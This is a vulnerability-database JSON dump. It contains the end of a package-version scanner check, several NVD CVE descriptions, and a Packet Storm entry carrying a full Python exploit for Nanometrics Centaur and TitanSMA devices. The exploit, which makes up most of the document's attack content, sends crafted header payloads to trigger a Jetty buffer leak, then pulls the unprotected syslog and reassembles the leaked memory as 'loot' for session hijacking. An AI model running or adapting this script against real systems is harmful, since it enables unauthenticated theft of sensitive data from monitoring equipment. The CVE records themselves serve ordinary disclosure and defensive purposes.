script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"gnupg2\", rpm:\"gnupg2~2.0.22~5.h2.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2020-02-27T13:45:24", "bulletinFamily": "NVD", "description": "Kernel/Modules/AgentTicketWatcher.pm in Open Ticket Request System (OTRS) 3.0.x before 3.0.21, 3.1.x before 3.1.17, and 3.2.x before 3.2.8 does not properly restrict tickets, which allows remote attackers with a valid agent login to read restricted tickets via a crafted URL involving the ticket split mechanism.", "modified": "2020-02-26T19:33:00", "id": "CVE-2013-4088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4088", "published": "2020-02-21T16:15:00", "title": "CVE-2013-4088", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2020-02-27T13:45:23", "bulletinFamily": "NVD", "description": "Kernel/Modules/AgentTicketPhone.pm in Open Ticket Request System (OTRS) 3.0.x before 3.0.20, 3.1.x before 3.1.16, and 3.2.x before 3.2.7, and OTRS ITSM 3.0.x before 3.0.8, 3.1.x before 3.1.9, and 3.2.x before 3.2.5 does not properly restrict tickets, which allows remote attackers with a valid agent login to read restricted tickets via a crafted URL involving the ticket split mechanism.", "modified": "2020-02-26T19:34:00", "id": "CVE-2013-3551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3551", "published": "2020-02-21T16:15:00", "title": "CVE-2013-3551", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2020-02-27T13:41:09", "bulletinFamily": "NVD", "description": "The CGIHTTPServer module in Python 2.7.5 and 3.3.4 does not properly handle URLs in which URL encoding is used for path separators, which allows remote attackers to read script source code or conduct directory traversal attacks and execute unintended code via a crafted character sequence, as demonstrated by a %2f separator.", "modified": "2020-02-26T13:49:00", "id": "CVE-2014-4650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4650", "published": "2020-02-20T17:15:00", "title": "CVE-2014-4650", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-26T12:48:49", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in the Android debug bridge (aka adb) in Android 4.0.4 allows physically proximate attackers with a direct connection to the target Android device to write to arbitrary files owned by system via a .. (dot dot) in the tar archive headers.", "modified": "2020-02-25T19:11:00", "id": "CVE-2014-7951", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7951", "published": "2020-02-20T16:15:00", "title": "CVE-2014-7951", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-21T13:06:28", "bulletinFamily": "NVD", "description": "Multiple stack-based buffer overflows in the __dn_expand function in network/dn_expand.c in musl libc 1.1x before 1.1.2 and 0.9.13 through 1.0.3 allow remote attackers to (1) have unspecified impact via an invalid name length in a DNS response or (2) cause a denial of service (crash) via an invalid name length in a DNS response, related to an infinite loop with no output.", "modified": "2020-02-20T13:07:00", "id": "CVE-2014-3484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3484", "published": "2020-02-20T04:15:00", "title": "CVE-2014-3484", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-21T13:08:35", "bulletinFamily": "NVD", "description": "The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in FreeBSD through 10.1 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message.", "modified": "2020-02-20T13:07:00", "published": "2020-02-20T04:15:00", "id": "CVE-2015-2923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2923", "title": "CVE-2015-2923", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:35:09", "bulletinFamily": "NVD", "description": "Buffer overflow in the afReadFrames function in audiofile (aka libaudiofile and Audio File Library) allows user-assisted remote attackers to cause a denial of service (program crash) or possibly execute arbitrary code via a crafted audio file, as demonstrated by sixteen-stereo-to-eight-mono.c.", "modified": "2020-02-19T21:20:00", "id": "CVE-2015-7747", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7747", "published": "2020-02-19T21:15:00", "title": "CVE-2015-7747", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:36:29", "bulletinFamily": "NVD", "description": "OverlayFS in the Linux kernel before 3.0.0-16.28, as used in Ubuntu 10.0.4 LTS and 11.10, is missing inode security checks which could allow attackers to bypass security restrictions and perform unauthorized actions.", "modified": "2020-02-19T18:50:00", "id": "CVE-2012-0055", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0055", "published": "2020-02-19T18:15:00", "title": "CVE-2012-0055", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-20T13:38:02", "bulletinFamily": "NVD", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", "modified": "2020-02-19T15:15:00", "published": "2020-02-19T15:15:00", "id": "CVE-2013-5581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5581", "title": "CVE-2013-5581", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-26T12:51:31", "bulletinFamily": "NVD", "description": "Nokogiri before 1.5.4 is vulnerable to XXE attacks", "modified": "2020-02-25T18:35:00", "id": "CVE-2012-6685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6685", "published": "2020-02-19T15:15:00", "title": "CVE-2012-6685", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-02-20T07:06:03", "bulletinFamily": "exploit", "description": "", "modified": "2020-02-19T00:00:00", "published": "2020-02-19T00:00:00", "id": "PACKETSTORM:156414", "href": "https://packetstormsecurity.com/files/156414/Nanometrics-Centaur-4.3.23-Memory-Leak.html", "title": "Nanometrics Centaur 4.3.23 Memory Leak", "type": "packetstorm", "sourceData": "`# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak \n# Date: 2020-02-15 \n# Author: byteGoblin \n# Vendor: https://www.nanometrics.ca \n# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# CVE: N/A \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. \n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \n#!/usr/bin/env python3 \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] - [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156414/nanometricscentaur4323-leak.txt"}]}